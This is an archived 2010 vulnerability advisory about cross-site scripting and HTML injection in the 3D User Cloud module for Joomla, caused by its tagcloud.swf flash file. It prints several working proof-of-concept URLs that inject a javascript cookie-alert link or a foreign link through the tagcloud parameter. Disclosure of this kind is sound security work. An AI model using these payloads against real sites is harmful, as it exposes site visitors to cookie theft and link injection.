Joomla 3D User Cloud Cross Site Scripting

Joomla 3D User Cloud Cross Site Scripting: Posted May 18, 2010; Authored by MustLive; The Joomla 3d User Cloud module suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 9fc91c0032fcc8df3d0047406137bef21f07e29da93375a76c0856ceba302786; Download | Favorite | View

Joomla 3D User Cloud Cross Site Scripting

Hello Bugtraq!

I want to warn you about security vulnerability in module 3D user cloud for
Joomla.

-----------------------------
Advisory: Vulnerability in 3D user cloud for Joomla
-----------------------------
URL: http://websecurity.com.ua/4198/
-----------------------------
Affected product: all versions of 3D user cloud (mod_democbusr3dcloud,
mod_cbusr3dcloud and mod_usr3dcloud) for Joomla.
-----------------------------
Timeline:

10.05.2010 - found vulnerability.
14.05.2010 - disclosed at my site.
15.05.2010 - informed developers.
-----------------------------
Details:

This is Cross-Site Scripting vulnerability.

This XSS is similar to XSS vulnerability in WP-Cumulus and other web
applications which I already reported to security mailing lists, because
it's using tagcloud.swf made by author of WP-Cumulus. About millions of
flash files tagcloud.swf which are vulnerable to XSS attacks I mentioned in
my article XSS vulnerabilities in 34 millions flash files
(http://www.webappsec.org/lists/websecurity/archive/2010-01/msg00035.html).

There are three version of the module: mod_democbusr3dcloud (demo version)
and mod_cbusr3dcloud and mod_usr3dcloud (full versions). Flash files are
tagcloud.swf and tagcloud_rus.swf.

XSS:

http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

Also it's possible to conduct (like in WP-Cumulus) HTML Injection attack,
including in those flash files which have protection (in flash files or via
WAF) against javascript and vbscript URI in parameter tagcloud.

HTML Injection:

http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 65 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 7 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,819)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,239)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,968)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Joomla 3D User Cloud Cross Site Scripting

Joomla 3D User Cloud Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla 3D User Cloud Cross Site Scripting

Share This

Joomla 3D User Cloud Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems